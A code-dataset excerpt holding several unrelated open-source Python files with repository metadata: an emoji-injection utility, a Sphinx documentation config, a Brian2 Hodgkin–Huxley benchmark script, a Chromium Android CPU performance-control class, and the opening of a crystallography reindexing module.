'calling', 'camel', 'camera', 'cancer', 'candy', 'capital_abcd',
'capricorn', 'car', 'card_index', 'carousel_horse', 'cat', 'cat2', 'cd',
'chart', 'chart_with_downwards_trend', 'chart_with_upwards_trend',
'checkered_flag', 'cherries', 'cherry_blossom', 'chestnut', 'chicken',
'children_crossing', 'chocolate_bar', 'christmas_tree', 'church', 'cinema',
'circus_tent', 'city_sunrise', 'city_sunset', 'cl', 'clap', 'clapper',
'clipboard', 'clock1', 'clock10', 'clock1030', 'clock11', 'clock1130',
'clock12', 'clock1230', 'clock130', 'clock2', 'clock230', 'clock3',
'clock330', 'clock4', 'clock430', 'clock5', 'clock530', 'clock6',
'clock630', 'clock7', 'clock730', 'clock8', 'clock830', 'clock9',
'clock930', 'closed_book', 'closed_lock_with_key', 'closed_umbrella',
'cloud', 'clubs', 'cn', 'cocktail', 'coffee', 'cold_sweat', 'collision',
'computer', 'confetti_ball', 'confounded', 'confused', 'congratulations',
'construction', 'construction_worker', 'convenience_store', 'cookie',
'cool', 'cop', 'copyright', 'corn', 'couple', 'couple_with_heart',
'couplekiss', 'cow', 'cow2', 'credit_card', 'crescent_moon', 'crocodile',
'crossed_flags', 'crown', 'cry', 'crying_cat_face', 'crystal_ball',
'cupid', 'curly_loop', 'currency_exchange', 'curry', 'custard', 'customs',
'cyclone', 'dancer', 'dancers', 'dango', 'dart', 'dash', 'date', 'de',
'deciduous_tree', 'department_store', 'diamond_shape_with_a_dot_inside',
'diamonds', 'disappointed', 'disappointed_relieved', 'dizzy', 'dizzy_face',
'do_not_litter', 'dog', 'dog2', 'dollar', 'dolls', 'dolphin', 'donut',
'door', 'doughnut', 'dragon', 'dragon_face', 'dress', 'dromedary_camel',
'droplet', 'dvd', 'e-mail', 'ear', 'ear_of_rice', 'earth_africa',
'earth_americas', 'earth_asia', 'egg', 'eggplant', 'eight',
'eight_pointed_black_star', 'eight_spoked_asterisk', 'electric_plug',
'elephant', 'email', 'end', 'envelope', 'es', 'euro', 'european_castle',
'european_post_office', 'evergreen_tree', 'exclamation', 'expressionless',
'eyeglasses', 'eyes', 'facepunch', 'factory', 'fallen_leaf', 'family',
'fast_forward', 'fax', 'fearful', 'feelsgood', 'feet', 'ferris_wheel',
'file_folder', 'finnadie', 'fire', 'fire_engine', 'fireworks',
'first_quarter_moon', 'first_quarter_moon_with_face', 'fish', 'fish_cake',
'fishing_pole_and_fish', 'fist', 'five', 'flags', 'flashlight',
'floppy_disk', 'flower_playing_cards', 'flushed', 'foggy', 'football',
'fork_and_knife', 'fountain', 'four', 'four_leaf_clover', 'fr', 'free',
'fried_shrimp', 'fries', 'frog', 'frowning', 'fu', 'fuelpump', 'full_moon',
'full_moon_with_face', 'game_die', 'gb', 'gem', 'gemini', 'ghost', 'gift',
'gift_heart', 'girl', 'globe_with_meridians', 'goat', 'goberserk',
'godmode', 'golf', 'grapes', 'green_apple', 'green_book', 'green_heart',
'grey_exclamation', 'grey_question', 'grimacing', 'grin', 'grinning',
'guardsman', 'guitar', 'gun', 'haircut', 'hamburger', 'hammer', 'hamster',
'hand', 'handbag', 'hankey', 'hash', 'hatched_chick', 'hatching_chick',
'headphones', 'hear_no_evil', 'heart', 'heart_decoration', 'heart_eyes',
'heart_eyes_cat', 'heartbeat', 'heartpulse', 'hearts', 'heavy_check_mark',
'heavy_division_sign', 'heavy_dollar_sign', 'heavy_exclamation_mark',
'heavy_minus_sign', 'heavy_multiplication_x', 'heavy_plus_sign',
'helicopter', 'herb', 'hibiscus', 'high_brightness', 'high_heel', 'hocho',
'honey_pot', 'honeybee', 'horse', 'horse_racing', 'hospital', 'hotel',
'hotsprings', 'hourglass', 'hourglass_flowing_sand', 'house',
'house_with_garden', 'hurtrealbad', 'hushed', 'ice_cream', 'icecream',
'id', 'ideograph_advantage', 'imp', 'inbox_tray', 'incoming_envelope',
'information_desk_person', 'information_source', 'innocent', 'interrobang',
'iphone', 'it', 'izakaya_lantern', 'jack_o_lantern', 'japan',
'japanese_castle', 'japanese_goblin', 'japanese_ogre', 'jeans', 'joy',
'joy_cat', 'jp', 'key', 'keycap_ten', 'kimono', 'kiss', 'kissing',
'kissing_cat', 'kissing_closed_eyes', 'kissing_face', 'kissing_heart',
'kissing_smiling_eyes', 'koala', 'koko', 'kr', 'large_blue_circle',
'large_blue_diamond', 'large_orange_diamond', 'last_quarter_moon',
'last_quarter_moon_with_face', 'laughing', 'leaves', 'ledger',
'left_luggage', 'left_right_arrow', 'leftwards_arrow_with_hook', 'lemon',
'leo', 'leopard', 'libra', 'light_rail', 'link', 'lips', 'lipstick',
'lock', 'lock_with_ink_pen', 'lollipop', 'loop', 'loudspeaker',
'love_hotel', 'love_letter', 'low_brightness', 'm', 'mag', 'mag_right',
'mahjong', 'mailbox', 'mailbox_closed', 'mailbox_with_mail',
'mailbox_with_no_mail', 'man', 'man_with_gua_pi_mao', 'man_with_turban',
'mans_shoe', 'maple_leaf', 'mask', 'massage', 'meat_on_bone', 'mega',
'melon', 'memo', 'mens', 'metal', 'metro', 'microphone', 'microscope',
'milky_way', 'minibus', 'minidisc', 'mobile_phone_off', 'money_with_wings',
'moneybag', 'monkey', 'monkey_face', 'monorail', 'mortar_board',
'mount_fuji', 'mountain_bicyclist', 'mountain_cableway',
'mountain_railway', 'mouse', 'mouse2', 'movie_camera', 'moyai', 'muscle',
'mushroom', 'musical_keyboard', 'musical_note', 'musical_score', 'mute',
'nail_care', 'name_badge', 'neckbeard', 'necktie',
'negative_squared_cross_mark', 'neutral_face', 'new', 'new_moon',
'new_moon_with_face', 'newspaper', 'ng', 'nine', 'no_bell', 'no_bicycles',
'no_entry', 'no_entry_sign', 'no_good', 'no_mobile_phones', 'no_mouth',
'no_pedestrians', 'no_smoking', 'non-potable_water', 'nose', 'notebook',
'notebook_with_decorative_cover', 'notes', 'nut_and_bolt', 'o', 'o2',
'ocean', 'octocat', 'octopus', 'oden', 'office', 'ok', 'ok_hand',
'ok_woman', 'older_man', 'older_woman', 'on', 'oncoming_automobile',
'oncoming_bus', 'oncoming_police_car', 'oncoming_taxi', 'one',
'open_file_folder', 'open_hands', 'open_mouth', 'ophiuchus', 'orange_book',
'outbox_tray', 'ox', 'package', 'page_facing_up', 'page_with_curl',
'pager', 'palm_tree', 'panda_face', 'paperclip', 'parking',
'part_alternation_mark', 'partly_sunny', 'passport_control', 'paw_prints',
'peach', 'pear', 'pencil', 'pencil2', 'penguin', 'pensive',
'performing_arts', 'persevere', 'person_frowning',
'person_with_blond_hair', 'person_with_pouting_face', 'phone', 'pig',
'pig2', 'pig_nose', 'pill', 'pineapple', 'pisces', 'pizza', 'plus1',
'point_down', 'point_left', 'point_right', 'point_up', 'point_up_2',
'police_car', 'poodle', 'poop', 'post_office', 'postal_horn', 'postbox',
'potable_water', 'pouch', 'poultry_leg', 'pound', 'pouting_cat', 'pray',
'princess', 'punch', 'purple_heart', 'purse', 'pushpin',
'put_litter_in_its_place', 'question', 'rabbit', 'rabbit2', 'racehorse',
'radio', 'radio_button', 'rage', 'rage1', 'rage2', 'rage3', 'rage4',
'railway_car', 'rainbow', 'raised_hand', 'raised_hands', 'raising_hand',
'ram', 'ramen', 'rat', 'recycle', 'red_car', 'red_circle', 'registered',
'relaxed', 'relieved', 'repeat', 'repeat_one', 'restroom',
'revolving_hearts', 'rewind', 'ribbon', 'rice', 'rice_ball',
'rice_cracker', 'rice_scene', 'ring', 'rocket', 'roller_coaster',
'rooster', 'rose', 'rotating_light', 'round_pushpin', 'rowboat', 'ru',
'rugby_football', 'runner', 'running', 'running_shirt_with_sash', 'sa',
'sagittarius', 'sailboat', 'sake', 'sandal', 'santa', 'satellite',
'satisfied', 'saxophone', 'school', 'school_satchel', 'scissors',
'scorpius', 'scream', 'scream_cat', 'scroll', 'seat', 'secret',
'see_no_evil', 'seedling', 'seven', 'shaved_ice', 'sheep', 'shell', 'ship',
'shipit', 'shirt', 'shit', 'shoe', 'shower', 'signal_strength',
'simple_smile', 'six', 'six_pointed_star', 'ski', 'skull', 'sleeping',
'sleepy', 'slot_machine', 'small_blue_diamond', 'small_orange_diamond',
'small_red_triangle', 'small_red_triangle_down', 'smile', 'smile_cat',
'smiley', 'smiley_cat', 'smiling_imp', 'smirk', 'smirk_cat', 'smoking',
'snail', 'snake', 'snowboarder', 'snowflake', 'snowman', 'sob', 'soccer',
'soon', 'sos', 'sound', 'space_invader', 'spades', 'spaghetti', 'sparkle',
'sparkler', 'sparkles', 'sparkling_heart', 'speak_no_evil', 'speaker',
'speech_balloon', 'speedboat', 'squirrel', 'star', 'star2', 'stars',
'station', 'statue_of_liberty', 'steam_locomotive', 'stew',
'straight_ruler', 'strawberry', 'stuck_out_tongue',
'stuck_out_tongue_closed_eyes', 'stuck_out_tongue_winking_eye',
'sun_with_face', 'sunflower', 'sunglasses', 'sunny', 'sunrise',
'sunrise_over_mountains', 'surfer', 'sushi', 'suspect',
'suspension_railway', 'sweat', 'sweat_drops', 'sweat_smile',
'sweet_potato', 'swimmer', 'symbols', 'syringe', 'tada', 'tanabata_tree',
'tangerine', 'taurus', 'taxi', 'tea', 'telephone', 'telephone_receiver',
'telescope', 'tennis', 'tent', 'thought_balloon', 'three', 'thumbsdown',
'thumbsup', 'ticket', 'tiger', 'tiger2', 'tired_face', 'tm', 'toilet',
'tokyo_tower', 'tomato', 'tongue', 'top', 'tophat', 'tractor',
'traffic_light', 'train', 'train2', 'tram', 'triangular_flag_on_post',
'triangular_ruler', 'trident', 'triumph', 'trolleybus', 'trollface',
'trophy', 'tropical_drink', 'tropical_fish', 'truck', 'trumpet', 'tshirt',
'tulip', 'turtle', 'tv', 'twisted_rightwards_arrows', 'two', 'two_hearts',
'two_men_holding_hands', 'two_women_holding_hands', 'u5272', 'u5408',
'u55b6', 'u6307', 'u6708', 'u6709', 'u6e80', 'u7121', 'u7533', 'u7981',
'u7a7a', 'uk', 'umbrella', 'unamused', 'underage', 'unlock', 'up', 'us',
'v', 'vertical_traffic_light', 'vhs', 'vibration_mode', 'video_camera',
'video_game', 'violin', 'virgo', 'volcano', 'vs', 'walking',
'waning_crescent_moon', 'waning_gibbous_moon', 'warning', 'watch',
'water_buffalo', 'watermelon', 'wave', 'wavy_dash', 'waxing_crescent_moon',
'waxing_gibbous_moon', 'wc', 'weary', 'wedding', 'whale', 'whale2',
'wheelchair', 'white_check_mark', 'white_circle', 'white_flower',
'white_large_square', 'white_medium_small_square', 'white_medium_square',
'white_small_square', 'white_square_button', 'wind_chime', 'wine_glass',
'wink', 'wolf', 'woman', 'womans_clothes', 'womans_hat', 'womens',
'worried', 'wrench', 'x', 'yellow_heart', 'yen', 'yum', 'zap', 'zero',
'zzz']
# def main(input_obj=None, output_obj=None, emoji_dir=None):
# """Invoke most common usage of the library."""
# handler = InjectEmoji(input_obj, output_obj, emoji_dir)
# return handler.main()
class InjectEmoji(object):
"""Replace emoji notations with HTML image tags."""
def __init__(self, input_obj=None, output_obj=None, emoji_dir=None):
"""
Set up the InjectEmoji object.
Args:
input_obj (FileObject): source to .readline() from.
Defaults to sys.stdin.
output_obj (FileObject): destination to .write() to.
Defaults to sys.stdout.
emoji_dir (str): Path to alternate emoji directory.
Overrides INJECT_EMOJI_DIR env variable. Defaults
to bundled emoji directory.
"""
if input_obj:
self._input = input_obj
else:
self._input = sys.stdin
if output_obj:
self._output = output_obj
else:
self._output = sys.stdout
self._use_bundled_emoji = True
if emoji_dir:
self._emoji_dir = emoji_dir
else:
self._emoji_dir = os.environ.get(
'INJECT_EMOJI_DIR', None)
if self._emoji_dir is None:
self._emoji_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.realpath(__file__))),
'emojis')
else:
self._use_bundled_emoji = False
self._pattern = None
def compile_pattern(self):
"""Compile re pattern from emoji directory listing."""
if self._use_bundled_emoji:
options = BUNDLED_EMOJI
else:
image_files = os.listdir(self._emoji_dir)
options = [x.replace('-', r'\-')
.replace('+', r'\+')[0:-4] for x in image_files]
self._pattern = re.compile(r'(?<!`)(:(' + r'|'.join(options) +
r'):)(?!`)')
def main(self):
"""Read from the input, write modified string to output."""
self.compile_pattern()
for line in self._input:
line = self._pattern.sub(
r'<img class="\2" title="\1" alt="\1" src="file://' +
self._emoji_dir +
r'/\2.png" height="20" width="20" align="absmiddle">', line)
self._output.write(line)
self._output.flush()
if __name__ == '__main__':
sys.exit(InjectEmoji(sys.stdin, sys.stdout).main())
|
claylo/inject-emoji
|
inject_emoji/inject_emoji.py
|
Python
|
mit
| 15,077
|
[
"Bowtie",
"Octopus"
] |
b274baea76c1f2257acd8affdc348ef0683cddd6cebefa7d39c3ab0429abe13b
|
# -*- coding: utf-8 -*-
#
# firefly-twisted documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 29 11:56:48 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'firefly-twisted'
copyright = u'2014, firefly'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0.'
# The full version, including alpha/beta/rc tags.
release = '1.0.0.'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'firefly-twisteddoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'firefly-twisted.tex', u'firefly-twisted Documentation',
u'firefly', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'firefly-twisted', u'firefly-twisted Documentation',
[u'firefly'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'firefly-twisted', u'firefly-twisted Documentation',
u'firefly', 'firefly-twisted', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'firefly-twisted'
epub_author = u'firefly'
epub_publisher = u'firefly'
epub_copyright = u'2014, firefly'
# The basename for the epub file. It defaults to the project name.
#epub_basename = u'firefly-twisted'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.python.org/': None}
|
yangdw/PyRepo
|
src/annotation/Firefly/docs/source/conf.py
|
Python
|
mit
| 10,603
|
[
"Firefly"
] |
bda5045d7e3b289ea77090936be397a7ecd62c90047990e76d7b0b764a5ade00
|
"""
# Notes:
- This simulation seeks to emulate the COBAHH benchmark simulations of (Brette
et al. 2007) using the Brian2 simulator for speed benchmark comparison to
DynaSim. However, this simulation does NOT include synapses, for better
comparison to Figure 5 of (Goodman and Brette, 2008) - although it uses the
COBAHH model of (Brette et al. 2007), not CUBA.
- The time taken to simulate will be indicated in the stdout log file
'~/batchdirs/brian_benchmark_COBAHH_nosyn_1/pbsout/brian_benchmark_COBAHH_nosyn_1.out'
- Note that this code has been slightly modified from the original (Brette et
al. 2007) benchmarking code, available here on ModelDB:
https://senselab.med.yale.edu/modeldb/showModel.cshtml?model=83319
in order to work with version 2 of the Brian simulator (aka Brian2), and also
modified to change the model being benchmarked, etc.
# References:
- Brette R, Rudolph M, Carnevale T, Hines M, Beeman D, Bower JM, et al.
Simulation of networks of spiking neurons: A review of tools and strategies.
Journal of Computational Neuroscience 2007;23:349–98.
doi:10.1007/s10827-007-0038-6.
- Goodman D, Brette R. Brian: a simulator for spiking neural networks in Python.
Frontiers in Neuroinformatics 2008;2. doi:10.3389/neuro.11.005.2008.
"""
from brian2 import *
# Parameters
cells = 1
defaultclock.dt = 0.01*ms
area = 20000*umetre**2
Cm = (1*ufarad*cmetre**-2) * area
gl = (5e-5*siemens*cmetre**-2) * area
El = -60*mV
EK = -90*mV
ENa = 50*mV
g_na = (100*msiemens*cmetre**-2) * area
g_kd = (30*msiemens*cmetre**-2) * area
VT = -63*mV
# # Time constants
# taue = 5*ms
# taui = 10*ms
# # Reversal potentials
# Ee = 0*mV
# Ei = -80*mV
# we = 6*nS # excitatory synaptic weight
# wi = 67*nS # inhibitory synaptic weight
# The model
eqs = Equations('''
dv/dt = (gl*(El-v)-
g_na*(m*m*m)*h*(v-ENa)-
g_kd*(n*n*n*n)*(v-EK))/Cm : volt
dm/dt = alpha_m*(1-m)-beta_m*m : 1
dn/dt = alpha_n*(1-n)-beta_n*n : 1
dh/dt = alpha_h*(1-h)-beta_h*h : 1
alpha_m = 0.32*(mV**-1)*(13*mV-v+VT)/
(exp((13*mV-v+VT)/(4*mV))-1.)/ms : Hz
beta_m = 0.28*(mV**-1)*(v-VT-40*mV)/
(exp((v-VT-40*mV)/(5*mV))-1)/ms : Hz
alpha_h = 0.128*exp((17*mV-v+VT)/(18*mV))/ms : Hz
beta_h = 4./(1+exp((40*mV-v+VT)/(5*mV)))/ms : Hz
alpha_n = 0.032*(mV**-1)*(15*mV-v+VT)/
(exp((15*mV-v+VT)/(5*mV))-1.)/ms : Hz
beta_n = .5*exp((10*mV-v+VT)/(40*mV))/ms : Hz
''')
# dv/dt = (gl*(El-v)+ge*(Ee-v)+gi*(Ei-v)-
# dge/dt = -ge*(1./taue) : siemens
# dgi/dt = -gi*(1./taui) : siemens
P = NeuronGroup(cells, model=eqs, threshold='v>-20*mV', refractory=3*ms,
method='euler')
# proportion=int(0.8*cells)
# Pe = P[:proportion]
# Pi = P[proportion:]
# Ce = Synapses(Pe, P, on_pre='ge+=we')
# Ci = Synapses(Pi, P, on_pre='gi+=wi')
# Ce.connect(p=0.98)
# Ci.connect(p=0.98)
# Initialization
P.v = 'El + (randn() * 5 - 5)*mV'
# P.ge = '(randn() * 1.5 + 4) * 10.*nS'
# P.gi = '(randn() * 12 + 20) * 10.*nS'
# Record a few traces
trace = StateMonitor(P, 'v', record=[1, 10, 100])
totaldata = StateMonitor(P, 'v', record=True)
run(0.5 * second, report='text')
# plot(trace.t/ms, trace[1].v/mV)
# plot(trace.t/ms, trace[10].v/mV)
# plot(trace.t/ms, trace[100].v/mV)
# xlabel('t (ms)')
# ylabel('v (mV)')
# show()
# print("Saving TC cell voltages!")
# numpy.savetxt("foo_totaldata.csv", totaldata.v/mV, delimiter=",")
|
asoplata/dynasim-benchmark-brette-2007
|
output/Brian2/brian2_benchmark_COBAHH_nosyn_0001/brian2_benchmark_COBAHH_nosyn_0001.py
|
Python
|
gpl-3.0
| 3,349
|
[
"Brian"
] |
501c066e037a65401ae8e132adebe9cd6f1fc3e41d91c32992cff16cf4ee6733
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from pylib import android_commands
from pylib.device import device_utils
class PerfControl(object):
"""Provides methods for setting the performance mode of a device."""
_SCALING_GOVERNOR_FMT = (
'/sys/devices/system/cpu/cpu%d/cpufreq/scaling_governor')
_CPU_ONLINE_FMT = '/sys/devices/system/cpu/cpu%d/online'
_KERNEL_MAX = '/sys/devices/system/cpu/kernel_max'
def __init__(self, device):
# TODO(jbudorick) Remove once telemetry gets switched over.
if isinstance(device, android_commands.AndroidCommands):
device = device_utils.DeviceUtils(device)
self._device = device
cpu_files = self._device.RunShellCommand(
'ls -d /sys/devices/system/cpu/cpu[0-9]*')
self._num_cpu_cores = len(cpu_files)
assert self._num_cpu_cores > 0, 'Failed to detect CPUs.'
logging.info('Number of CPUs: %d', self._num_cpu_cores)
self._have_mpdecision = self._device.FileExists('/system/bin/mpdecision')
def SetHighPerfMode(self):
# TODO(epenner): Enable on all devices (http://crbug.com/383566)
if 'Nexus 4' == self._device.old_interface.GetProductModel():
self._ForceAllCpusOnline(True)
if not self._AllCpusAreOnline():
logging.warning('Failed to force CPUs online. Results may be noisy!')
self._SetScalingGovernorInternal('performance')
def SetPerfProfilingMode(self):
"""Sets the highest possible performance mode for the device."""
self._ForceAllCpusOnline(True)
self._SetScalingGovernorInternal('performance')
if not self._AllCpusAreOnline():
if not self._device.old_interface.IsRootEnabled():
raise RuntimeError('Need root to force CPUs online.')
raise RuntimeError('Failed to force CPUs online.')
def SetDefaultPerfMode(self):
"""Sets the performance mode for the device to its default mode."""
product_model = self._device.GetProp('ro.product.model')
governor_mode = {
'GT-I9300': 'pegasusq',
'Galaxy Nexus': 'interactive',
'Nexus 4': 'ondemand',
'Nexus 7': 'interactive',
'Nexus 10': 'interactive'
}.get(product_model, 'ondemand')
self._SetScalingGovernorInternal(governor_mode)
self._ForceAllCpusOnline(False)
def _SetScalingGovernorInternal(self, value):
for cpu in range(self._num_cpu_cores):
scaling_governor_file = PerfControl._SCALING_GOVERNOR_FMT % cpu
if self._device.FileExists(scaling_governor_file):
logging.info('Writing scaling governor mode \'%s\' -> %s',
value, scaling_governor_file)
self._device.WriteFile(scaling_governor_file, value, as_root=True)
def _AllCpusAreOnline(self):
for cpu in range(self._num_cpu_cores):
online_path = PerfControl._CPU_ONLINE_FMT % cpu
if self._device.ReadFile(online_path)[0] == '0':
return False
return True
def _ForceAllCpusOnline(self, force_online):
"""Enable all CPUs on a device.
Some vendors (or only Qualcomm?) hot-plug their CPUs, which can add noise
to measurements:
- In perf, samples are only taken for the CPUs that are online when the
measurement is started.
- The scaling governor can't be set for an offline CPU and frequency scaling
on newly enabled CPUs adds noise to both perf and tracing measurements.
It appears Qualcomm is the only vendor that hot-plugs CPUs, and on Qualcomm
this is done by "mpdecision".
"""
if self._have_mpdecision:
script = 'stop mpdecision' if force_online else 'start mpdecision'
self._device.RunShellCommand(script, as_root=True)
if not self._have_mpdecision and not self._AllCpusAreOnline():
logging.warning('Unexpected cpu hot plugging detected.')
if not force_online:
return
for cpu in range(self._num_cpu_cores):
online_path = PerfControl._CPU_ONLINE_FMT % cpu
self._device.WriteFile(online_path, '1', as_root=True)
|
appknox/xysec_adb
|
xysec_adb/pylib/perf/perf_control.py
|
Python
|
apache-2.0
| 4,074
|
[
"Galaxy"
] |
9418b0616f310a8ea99322c4b50bfded5c8a447686d10841dc6a34035f36b2f7
|
"""
(c) RIKEN 2015. All rights reserved.
Author: Keitaro Yamashita
This software is released under the new BSD License; see LICENSE.
"""
from yamtbx.dataproc.xds.xds_ascii import XDS_ASCII
from yamtbx.util.xtal import format_unit_cell
from cctbx import crystal
from cctbx.crystal import reindex
from cctbx.array_family import flex
from cctbx import sgtbx
from libtbx.utils import null_out
from libtbx import easy_mp
from libtbx import adopt_init_args
from cctbx.merging import brehm_diederichs
import os
import copy
import multiprocessing
import time
import numpy
def calc_cc(a1, a2):
a1, a2 = a1.common_sets(a2, assert_is_similar_symmetry=False)
corr = flex.linear_correlation(a1.data(), a2.data())
if corr.is_well_defined():# and a1.size() > 20:
return corr.coefficient()
else:
return float("nan")
# calc_cc()
class ReindexResolver:
def __init__(self, xac_files, d_min=3, min_ios=3, nproc=1, max_delta=5, log_out=null_out()):
adopt_init_args(self, locals())
self.arrays = []
self.best_operators = None
self._representative_xs = None
self.bad_files = []
# __init__()
def representative_crystal_symmetry(self): return self._representative_xs
def read_xac_files(self, from_p1=False):
op_to_p1 = None
if from_p1:
"""
This option is currently for multi_determine_symmetry.
Do not use this for ambiguity resolution! op_to_p1 is not considered when writing new HKL files.
"""
self.log_out.write("\nAveraging symmetry of all inputs..\n")
cells = []
sgs = []
for f in self.xac_files:
xac = XDS_ASCII(f, read_data=False)
cells.append(xac.symm.unit_cell().parameters())
sgs.append(xac.symm.space_group())
assert len(set(sgs)) < 2
avg_symm = crystal.symmetry(list(numpy.median(cells, axis=0)), space_group=sgs[0])
op_to_p1 = avg_symm.change_of_basis_op_to_niggli_cell()
self.log_out.write(" Averaged symmetry: %s (%s)\n" % (format_unit_cell(avg_symm.unit_cell()), sgs[0].info()))
